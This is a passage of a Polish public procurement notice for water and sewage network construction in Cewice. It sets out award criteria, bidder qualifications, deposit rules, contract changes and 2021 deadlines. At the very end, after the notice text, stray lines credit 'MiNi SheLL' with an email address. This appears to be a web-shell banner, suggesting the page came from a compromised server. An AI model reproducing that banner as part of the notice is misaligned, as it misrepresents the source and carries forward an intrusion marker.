takim przypadku zadeklarowanie dłuższego okresu będzie powodować odpowiednią punktację w kryteriach oceny ofert<br/>4.	Zmawiający nie wymaga osobistego wykonania przez Wykonawcę kluczowych zadań dotyczących robót budowlanych objętych przedmiotem zamówienia. <br/>5.	Katalogi elektroniczne – Zamawiający nie wymaga złożenia oferty w postaci katalogów elektronicznych <br/>6.	Ponadto Zamawiający wymaga, aby odtworzenie nawierzchni dróg i ciągów komunikacyjnych po wykonaniu wodociągu i kanalizacji, montażu przepompowni PP2 i innych elementów uzbrojenia sieci wodociągowej i kanalizacyjnej, zostały wykonane w sposób, który nie będzie utrudniał komunikacji osobom niepełnosprawnym i osobom z ograniczeniami poruszania się.<br/><br/>Wymagania związane z zatrudnieniem na podstawie stosunku pracy<br/><br/>1.	Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę w rozumieniu aktualnych przepisów Kodeksu Pracy osób wykonujących czynności w zakresie realizacji zamówienia: <br/>(1)	Roboty ziemne.<br/>(2)	Roboty przy budowie sieci wodociągowej.<br/>(3)	Roboty przy budowie sieci kanalizacji sanitarnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45232423-3 - Roboty budowlane w zakresie przepompowni ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te<br/>oferty,któreniezostałyodrzucone2. maksymalna liczba punktów, jaką może uzyskać oferta wynosi<br/>100,00.Zamawiający wyliczając liczbę punktów dokona obliczeń z dokładnością do dwóch miejsc po<br/>przecinku.3. Początek okresu gwarancji i rękojmi za wady liczony jest od dnia bezusterkowego<br/>odbiorukońcowego.4. Minimalny okres gwarancji i rękojmi za wady wynosi 36 miesięcy, amaksymalny<br/>60 miesięcy. 5. Jeżeli Wykonawca zaproponuje okres gwarancji i rękojmi za wady powyżej wartości<br/>maksymalnej, wówczas:a) do wyliczenia punktacji w tych kryteriach będzie przyjmowanawartość 60<br/>miesięcy,b) do umowy zostanie wpisany zadeklarowany w ofercie okres gwarancji i rękojmi za<br/>wady6.Jeżeli Wykonawca w swej ofercie nie określi okresu gwarancji i rękojmi za wady, albo też<br/>zaproponuje okres krótszy niż określone powyżej terminy minimalne, będzie to uznane za<br/>niezgodnośćoferty z warunkami zamówienia i oferta taka podlegać będzie odrzuceniu, na podstawie<br/>art. 226 ust 1 pkt 5ustawy7.Zamawiający udzieli niniejszego zamówienia Wykonawcy, którego oferta<br/>uzyska najwyższą sumę punktów zdobytych w kryterium cena i deklarowany okres gwarancji i rękojmi<br/>zawady, zgodnie ze wzorem:SP = K1 + K2Gdzie symbol SP – suma liczby punktów w poszczególnych<br/>kryteriach cenyofertK1 – liczba punktów w kryterium „cena"K2 – liczba punktów w kryterium<br/>„deklarowany okres gwarancji i rękojmi za wady</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">deklarowany okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga, aby Wykonawca potwierdził posiadanie zdolności technicznej <br/>lub zawodowej poprzez wykazanie:<br/><br/>a.	Wykonania co najmniej 1 roboty budowlanej odpowiadającej swoim rodzajem przedmiotowi zamówienia (budowa sieci wodociągowej lub kanalizacyjnej) o wartości nie mniejszej niż 1.000.000,00 złotych brutto, wykonanej nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem jej rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których robota ta została wykonana, z załączeniem dowodów określających, czy robota ta została wykonana należycie, w szczególności informacji o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. <br/><br/>b.	Skierowania do realizacji zamówienia publicznego co najmniej <br/>•	1 osoby posiadającej ważne uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (kierownik budowy) <br/>•	1 osoby posiadającej ważne uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji elektrycznych (kierownik robót) <br/>lub inne prawem dopuszczone na podstawie wcześniej obowiązujących przepisów <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej, Zamawiający wymaga, aby Wykonawca przedstawił następujące podmiotowe środki dowodowe: <br/>a)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których te roboty zostały wykonane oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie. Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane. <br/>b)	Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowalnymi, wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W odniesieniu do warunków dotyczących WYKSZTAŁCENIA, KWALIFIKACJI ZAWODOWYCH<br/>LUB DOŚWIADCZENIA wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogąpolegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do<br/>realizacji<br/>których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie z art. 117 ust 4, z którego wynika, które<br/>roboty budowlane wykonają poszczególni Wykonawcy.Wykonawca, który polega na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby składa, wraz z ofertą<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty<br/>udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub<br/>ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w<br/>postępowaniu oraz bada, czy nie zachodzą wobec tych podmiotów podstawy wykluczenia, o<br/>których mowa w art. 108 ust 1 ustawy20. Na dzień składania ofert każdy Wykonawca powinien<br/>złożyć następujące dokumenty:a) formularz oferty sporządzony na podstawie wzoru<br/>stanowiącego załącznik nr 1;b) oświadczenia z art. 125 ust. 1 ustawy Wykonawcy<br/>potwierdzające spełnianie warunków udziału w postępowaniu o treści zgodnej z załącznikiem nr<br/>2;c) oświadczenie z art. 125 ust 1 ustawy Wykonawcy potwierdzające brak podstaw do<br/>wykluczenia o treści zgodnej z załącznikiem nr 3d) wykaz części zamówienia, których wykonanie<br/>zostanie powierzone podwykonawcy o treści zgodnej z załącznikiem nr 9 – jeżeli dotyczy e)<br/>zobowiązanie podmiotu udostępniającego zasoby – jeżeli dotyczy, o treści zgodnej z<br/>załącznikiem nr 10f) oświadczenie z art. 125 ust 5 ustawy podmiotu udostępniającego zasoby<br/>potwierdzające niepodleganie wykluczeniu z postępowania i spełnianie warunków udziału w<br/>postępowaniu o treści zgodnej z załącznikiem nr 4g) Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie z art. 117 ust 4 ustawy, z którego<br/>wynika, które roboty budowlane wykonają poszczególni Wykonawcy o treści zgodnej z<br/>załącznikiem nr 7 h) stosowne pełnomocnictwa lub inne dokumenty potwierdzające umocowanie<br/>do reprezentowania Wykonawcy w przypadku, gdy nie wynika ono bezpośrednio z dokumentów<br/>dołączonych do oferty;i) w przypadku Wykonawców wspólnie ubiegających się o realizację<br/>zamówienia dokument ustanawiający Pełnomocnika do reprezentowania w postępowaniu lub do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia<br/>publicznego lub inne dokumenty potwierdzające umocowanie osoby reprezentującej<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia do ich reprezentowania<br/>Zamawiający wzywa Wykonawcę, którego oferta zostanie najwyżej oceniona do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych: a) wykaz<br/>robót o treści zgodnej z załącznikiem nr 6; b) wykaz osób skierowanych do realizacji zamówienia<br/>publicznego o treści zgodnej z załącznikiem nr 8;c) oświadczenia z art. 125 ust 1 od<br/>podwykonawcy niebędącego podmiotem udostępniającym zasoby w zakresie niepodlegania<br/>wykluczeniu z postępowania o treści zgodnej z załącznikiem nr 5 <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zasady wnoszenia wadium<br/>1.	Zamawiający wymaga wniesienia wadium w kwocie 12 000,00 zł <br/>2.	Wadium może być wnoszone zgodnie z wyborem Wykonawcy w jednej lub kilku następujących formach <br/>a.	Pieniądzu – przelewem na rachunek bankowy Zamawiającego Bank Spółdzielczy w Łebie o/Czarna Dąbrówka nr 54 9324 1018 0022 6556 2000 0340 z dopiskiem wadium na budowę sieci wod-kan w Cewicach; za termin wniesienia wadium w formie pieniężnej zostanie przyjęta data uznania rachunku Zamawiającego; kserokopię dowodu wpłaty wadium potwierdzoną przez Wykonawcę należy dołączyć do oferty<br/>b.	Gwarancjach bankowych<br/>c.	Gwarancjach ubezpieczeniowych<br/>d.	Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości <br/>3.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/>4.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej <br/>5.	W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, powinny one zostać sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:<br/>•	Nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji lub poręczenia (Zamawiającego), gwaranta lub poręczyciela (banku lub instytucji ubezpieczeniowej udzielającej gwarancji lub poręczenia) oraz wskazanie ich siedzib;<br/>•	Określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem;<br/>•	Kwotę gwarancji lub poręczenia;<br/>•	Termin ważności gwarancji lub poręczenia;<br/>•	Zobowiązania gwaranta lub poręczyciela do: zapłacenia kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie o zaistnieniu którejkolwiek z sytuacji określonej w art. 98 ust 6 ustawy, skutkującej koniecznością zatrzymania wadium Wykonawcy, dla którego wystawiono odpowiednio gwarancję lub poręczenie.<br/>6.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje się nieprzerwanie do upływu terminu związania ofertą, zawarcia umowy ws zamówienia publicznego lub unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie zostało rozstrzygnięte odwołanie na unieważnienie postępowania lub nie upłynął termin do jego wniesienia <br/>7.	Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo jeżeli nie jest to możliwe z wniesieniem nowego wadium na przedłużony okres związania ofertą. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienie, zgodnie z art. 58<br/>w związku z art. 445 ust 1 ustawy PZP Zamawiający żąda aby:1) W przypadku oferty składanej<br/>wspólnie przez Wykonawców oświadczenie z art. 125 ust 1 składa każdy z Wykonawców<br/>odrębnie. Oświadczenia te potwierdzają brak podstawy wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie<br/>warunków udziału w postępowaniu.2) W przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia uznaje się, iż warunek dotyczący uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej jest spełniony, jeśli co najmniej jeden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane (usługi,<br/>dostawy), do których realizacji te uprawnienia są wymagane. 3) W odniesieniu do warunków<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców,<br/>którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. 4)<br/>W przypadku, o którym mowa w ust 2 i 3 powyżej, Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane (dostawy, usługi) wykonają poszczególni Wykonawcy 5) Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia lub do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. Załączone Pełnomocnictwo powinno zawierać:<br/>jednoznaczne określenie postępowania, do którego się odnosi i precyzować zakres<br/>umocowania; wymieniać wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia i zawierać podpisy każdego z nich;6) Jeżeli w imieniu Wykonawców wspólnieubiegających się o udzielenie zamówienia działa osoba, której umocowanie do ich<br/>reprezentowania nie wynika z dokumentów takich jak KRS lub odpis z właściwego rejestru,<br/>Zamawiający będzie wymagał od Wykonawców wspólnie ubiegających się o<br/>udzieleniezamówienia przedstawienia pełnomocnictwa lub innego dokumentu potwierdzającego<br/>umocowanie tej osoby do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. 7) wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem lub<br/>osobą działającą w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia;8)<br/>w przypadku wyboru przez Zamawiającego oferty złożonej przez Wykonawców wspólnie<br/>ubiegających się o zamówienie, Wykonawcy zobowiązani będą do przedłożenia umowy<br/>regulującej współpracę Wykonawców w terminie nie krótszym niż 7 dni przed podpisaniem<br/>umowy w sprawie zamówienia publicznego;9) umowa , o której mowa w ust 8 niniejszego<br/>rozdziału winna zawierać w szczególności: oznaczenie stron, cel działania, czas trwania umowy,<br/>zasady współdziałania , w tym zakres prac powierzonych każdej ze stron oraz zasady<br/>dokonywania rozliczeń, w tym nazwę banku i numer rachunku, na który dokonywane będą<br/>płatności z tytułu realizacji zamówienia.10) Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie<br/>zabezpieczenia należytego wykonania umowy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany postanowień umowy, na skutek wystąpienia poniższych okoliczności mogą dotyczyć<br/>następujących jej elementów:1) terminu wykonania zamówienia 2) terminów płatności 3)<br/>parametrów przedmiotu zamówienia4) wynagrodzenia .5) podwykonawstwa w przypadkach<br/>określonych w dokumentach zamówieniaNadto Zamawiający przewiduje możliwość dokonania<br/>zmian:1) zmiany dokonanej na podstawie art. 23 pkt 1 ustawy Prawo budowlane – zmiana w<br/>rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia<br/>bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy;2) zmiany<br/>dokonanej na podstawie art. 20 ust. 1 pkt 4 lit. a ustawy Prawo budowlane – uzgodniona<br/>możliwość wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie,<br/>zgłoszonych przez Kierownika budowy lub przedstawiciela Zamawiającego;3) zmiany dokonanej<br/>podczas wykonywania robót i nie odstępującej w sposób istotny od zatwierdzonego projektu;4)<br/>zmiany postanowień umowy o zamówienie publiczne w przypadku stwierdzenia, że okoliczności<br/>związane z wystąpieniem COVID-19 wpływają na należyte wykonanie umowy;5) zmiany osób<br/>uczestniczących w realizacji przedmiotu umowy, zmiany kierownika budowy lub osób<br/>odpowiedzialnych za kierowanie robotami budowlanymi z zastrzeżeniem, iż nowe osoby będą<br/>spełniały wymagania określone w postępowaniu w sprawie udzielenia zamówienia publicznego,<br/>w wyniku którego została zawarta niniejsza umowa;6) zamawiający zastrzega sobie prawo do<br/>zmiany inspektora nadzoru inwestorskiego.W przypadku wystąpienia okoliczności wskazanych<br/>w ust. 3 pkt 1) umowy, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu<br/>umowy, termin ten może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych<br/>okoliczności.W przypadku wystąpienia okoliczności stanowiących podstawę do zmiany<br/>postanowień umowy Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym<br/>fakcie Zamawiającego i wystąpienia z pisemnym wnioskiem o dokonanie zmian w przedmiotowej<br/>umowie.Jeżeli Zamawiający uzna, że okoliczności wskazane przez Wykonawcę jako stanowiące<br/>podstawę umowy nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodne z<br/>warunkami zawartymi w umowie.Powyższe postanowienia stanowią katalog zmian, na któreZamawiający może wyrazić zgodę. Nie stanowią natomiast zobowiązania Zamawiającego do<br/>wyrażenia zgody na ich wprowadzenie.Zmiana umowy podlega unieważnieniu, jeśli została<br/>dokonana z naruszeniem art. 454 i art. 455 ustawy. W takim przypadku stosuje<br/>siępostanowienia umowne w brzmieniu obowiązującym przed tą zmianą.Strony umowy<br/>zawierają<br/>stosowny aneks w celu dokonania zmian w niniejszej umowie uwzględniający warunki zmiany<br/>umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę składa się w języku polskim pod rygorem nieważności w formie elektronicznej lub postaci elektronicznej, opatrzonej podpisem zaufanym lub podpisem osobistym na Platformie dostępnej pod adresem https://cewice.ezamawiajacy.pl w zakładce OFERTY</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-15 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-14</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o<br/>zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, wraz z przekazaniem tych informacji<br/>zastrzegł, że nie mogą być one udostępnione oraz wykazał, iż zastrzeżone informacje stanowią<br/>tajemnicę przedsiębiorstwa. W przypadku, gdy dokumenty elektroniczne w postępowaniu,<br/>przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa Wykonawca w celu utrzymania w poufności tych informacji,<br/>przekazuje je w wydzielonym i odpowiednio wydzielonym pliku. Wykonawca nie może zastrzec<br/>informacji zawartych w ofercie dotyczących nazwy lub imion i nazwisk oraz siedziby lub miejsca<br/>prowadzenia działalności gospodarczej albo miejsca zamieszkania oraz ceny. Proponuje się,<br/>aby zastrzeżenie dokonane było przez złożenie oferty w dwóch częściach opisanych jako „część<br/>jawna oferty” oraz „część zastrzeżona oferty”. Zgodnie z art. 11 ust 2 ustawy z dnia 16 kwietnia<br/>1993 r o zwalczaniu nieuczciwej konkurencji (Dz. U. 2018 poz. 419) poprzez pojęcie tajemnicy<br/>przedsiębiorstwa rozumie się informacje techniczne, technologiczne, organizacyjne<br/>przedsiębiorstwa lub inne informacje posiadające wartość gospodarczą, które jako całość lub w<br/>szczególnym zestawieniu i zbiorze ich elementów nie są powszechnie znane osobom zwykle<br/>zajmującym się tym rodzajem informacji albo nie są łatwo dostępne dla takich osób, o ile<br/>uprawniony do korzystania z informacji lub rozporządzania nimi podjął, przy zachowaniu<br/>należytej staranności, działania w celu utrzymania ich poufności

Creat By MiNi SheLL
Email: jattceo@gmail.com